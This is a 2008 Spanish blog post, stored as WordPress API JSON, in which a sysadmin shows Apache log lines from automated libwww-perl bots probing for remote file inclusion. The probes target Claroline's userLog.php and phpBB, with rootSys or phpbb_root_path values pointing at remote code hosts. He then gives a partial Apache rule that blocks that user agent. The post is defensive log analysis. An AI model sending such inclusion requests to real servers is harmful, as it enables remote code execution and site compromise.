{"id":533,"date":"2008-03-06T12:39:21","date_gmt":"2008-03-06T12:39:21","guid":{"rendered":"http:\/\/blografia.net\/vicm3\/?p=533"},"modified":"2008-03-06T12:39:21","modified_gmt":"2008-03-06T12:39:21","slug":"y-seguimos-con-los-bots-exploiters","status":"publish","type":"post","link":"https:\/\/blografia.net\/vicm3\/2008\/03\/y-seguimos-con-los-bots-exploiters\/","title":{"rendered":"Y seguimos con los bots exploiters"},"content":{"rendered":"

Para variar los exploiters automatizados siguen usando libwww-perl… bueno en lighttpd ya lo resolvi, anoche cai en cuenta que tambien en apache estaba teniendo muchas peticiones de estas… y todavia tengo 3 apaches en maquinas relativamente grandes, pero me parece que es un desperdicio de conexiones para la mas peque\u00f1a de ellas (384MB), m\u00e1s aun me aburre tener que leer mi reporte de logwatch con un monton de alertas de \u00abprobes\u00bb… <\/p>\n

\nfoobar:\/var\/log\/apache# grep libwww access.log
\n124.217.247.166 – – [06\/Mar\/2008:11:43:01 -0600] \u00abGET \/~vicm3\/consol2006\/Ponencia\/\/claroline\/tracking\/userLog.php?rootSys=http:\/\/www.ar-vision.com\/galery.txt? HTTP\/1.1\u00bb 404 391 \u00ab-\u00bb \u00ablibwww-perl\/5.79\u00bb
\n124.217.247.166 – – [06\/Mar\/2008:11:43:01 -0600] \u00abGET \/\/claroline\/tracking\/userLog.php?rootSys=http:\/\/www.ar-vision.com\/galery.txt? HTTP\/1.1\u00bb 404 364 \u00ab-\u00bb \u00ablibwww-perl\/5.79\u00bb
\n124.217.247.166 – – [06\/Mar\/2008:12:01:42 -0600] \u00abGET \/~vicm3\/plataformas\/Plataformas%20UPN%201-8-2006.ppt\/\/claroline\/tracking\/userLog.php?rootSys=http:\/\/www.ar-vision.com\/galery.txt? HTTP\/1.1\u00bb 404 412 \u00ab-\u00bb \u00ablibwww-perl\/5.79\u00bb
\n124.217.247.166 – – [06\/Mar\/2008:12:01:43 -0600] \u00abGET \/~vicm3\/plataformas\/\/claroline\/tracking\/userLog.php?rootSys=http:\/\/www.ar-vision.com\/galery.txt? HTTP\/1.1\u00bb 404 383 \u00ab-\u00bb \u00ablibwww-perl\/5.79\u00bb
\nfoobar:\/var\/log\/apache#\n<\/p><\/blockquote>\n

Y no tenia bien esto, por un error en un bomberazo anterior en donde los vhost los habia definido con common en lugar de combined, por lo que no estaba guardando los nombres de los agentes (si se que es casi trivial cambiar el agent en script de perl, en todo caso, eso deja fuera a los wanna-be).<\/p>\n

Bueno tal cual lo intente con lighttpd pues a buscar como han resuelto otros el problema, me encontre con un muy buen ejemplo para evitar el harvesting de emails, pero mejor a\u00fan en los comentarios me encontre algunos tips para implementarlo en http:\/\/www.evolt.org\/article\/Using_Apache_to_stop_bad_robots\/18\/15126\/<\/a> apache para bloquear scripts que intenten vulnerabilidades.<\/p>\n

[code=’Apache’]
\n### Anti exploiters
\nSetEnvIfNoCase User-Agent \u00ab.*libwww.*\u00bb bad_bot<\/p>\n


\nOrder Allow,Deny
\nAllow from all
\nDeny from env=bad_bot
\n<\/FilesMatch><\/p>\n

SetEnvIfNoCase User-Agent <\/p>\n","protected":false},"excerpt":{"rendered":"

Para variar los exploiters automatizados siguen usando libwww-perl… bueno en lighttpd ya lo resolvi, anoche cai en cuenta que tambien en apache estaba teniendo muchas peticiones de estas… y todavia tengo 3 apaches en maquinas relativamente grandes, pero me parece … Sigue leyendo →<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"advanced_seo_description":"","jetpack_seo_html_title":"","jetpack_seo_noindex":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2},"jetpack_post_was_ever_published":false},"categories":[1],"tags":[],"class_list":["post-533","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":1068,"url":"https:\/\/blografia.net\/vicm3\/2013\/06\/legacy-code-everywhere\/","url_meta":{"origin":533,"position":0},"title":"Legacy code everywhere","author":"vicm3","date":"19 junio, 2013","format":false,"excerpt":"From last weekend our blog lacobachab where not updating their feed, as I removed and updated wp-cache info, most probably I removed redundant entries on .htaccess, BUT looks like removed the correct ones and left the wrong ones, tip if you don't know if your .htaccess mod_rewrite rules are OK,\u2026","rel":"","context":"En \u00abDebraye\u00bb","block_context":{"text":"Debraye","link":"https:\/\/blografia.net\/vicm3\/category\/debraye\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":440,"url":"https:\/\/blografia.net\/vicm3\/2007\/07\/robots_defacers\/","url_meta":{"origin":533,"position":1},"title":"Robots defacers","author":"vicm3","date":"10 julio, 2007","format":false,"excerpt":"A ultimas fechas me he encontrado con que los defacers y\/o script kiddies ya tienen unos scripts (valga la rebusnancia), automatizados en perl [code='Bash'] dominioatacado.com:75.126.134.16 - - [10\/Jul\/2007:01:34:30 -0500] \"GET \/guruforo\/index.php\/modules\/Forums\/admin\/admin_styles.php?phpb b_root_path=http:\/\/floydz.imess.net\/cmd.txt? HTTP\/1.1\" 200 56485 \"-\" \"libwww-perl\/5.805\" dominioatacado.com:75.126.134.16 - - [10\/Jul\/2007:10:07:56 -0500] \"GET \/guruforo\/index.php\/MOD_forum_fields_parse.php?phpbb_root_path =http:\/\/floydz.imess.net\/cmd.txt? HTTP\/1.1\" 200 56480 \"-\" \"libwww-perl\/5.805\"\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":606,"url":"https:\/\/blografia.net\/vicm3\/2008\/11\/estaba-pensando-en\/","url_meta":{"origin":533,"position":2},"title":"Estaba pensando en","author":"vicm3","date":"16 noviembre, 2008","format":false,"excerpt":"Aprovechar que la p\u00e1gina de la UPN esta creada con drupal (de paso fijandome que no han sido para quitar el favicon.ico default), para a\u00f1adir al sitio de moodle que estamos utilizando el rss de las noticias de la pagina para lo cual pues como tengo el firefox como default\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1984,"url":"https:\/\/blografia.net\/vicm3\/2019\/01\/adios-claroline\/","url_meta":{"origin":533,"position":3},"title":"Adi\u00f3s Claroline","author":"vicm3","date":"16 enero, 2019","format":false,"excerpt":"En realidad hace un rato que no funciona mi instancia, me quede en la versi\u00f3n 1.11 y seguro desde que cambiamos stretch actualizo a PHP 7 seguramente dejo de funcionar, hoy he decidido archivar los php y retirarlos del directorio de Apache. Le dedique un buen rato a esta plataforma\u2026","rel":"","context":"En \u00abEducaci\u00f3n\u00bb","block_context":{"text":"Educaci\u00f3n","link":"https:\/\/blografia.net\/vicm3\/category\/educacion\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":256,"url":"https:\/\/blografia.net\/vicm3\/2006\/03\/y_bueno_aunque_nadie_ha_preguntado\/","url_meta":{"origin":533,"position":4},"title":"Y bueno aunque nadie ha preguntado…","author":"vicm3","date":"25 marzo, 2006","format":false,"excerpt":"El otro dia le preguntaba a Gunnar si lo que me ayudo a hacer con mi DB de convertir de utf8 a latin1, se podria aplicar a texto, plano mas especificamente a un index.html, por cierto pongo el codigo como quedo por que me parece muy eficiente y bueno (y\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":709,"url":"https:\/\/blografia.net\/vicm3\/2010\/01\/ayer-en-un-rato-de-ocio\/","url_meta":{"origin":533,"position":5},"title":"Ayer en un rato de ocio","author":"vicm3","date":"20 enero, 2010","format":false,"excerpt":"Leyendo en el twitter Vi que salio la encuesta de un partido politico sobre la opinion que uno tiene sobre el futuro de los ni\u00f1os y la preferencia sexual de los padres http:\/\/www.pandf.org.mx\/quieroopinar\/ Ayer tambi\u00e9n me quede pensando, en todas las encuestas que maneja drupal, phpnuke, phpesp, etc. Es muy\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/posts\/533","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/comments?post=533"}],"version-history":[{"count":0,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/posts\/533\/revisions"}],"wp:attachment":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/media?parent=533"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/categories?post=533"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/tags?post=533"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}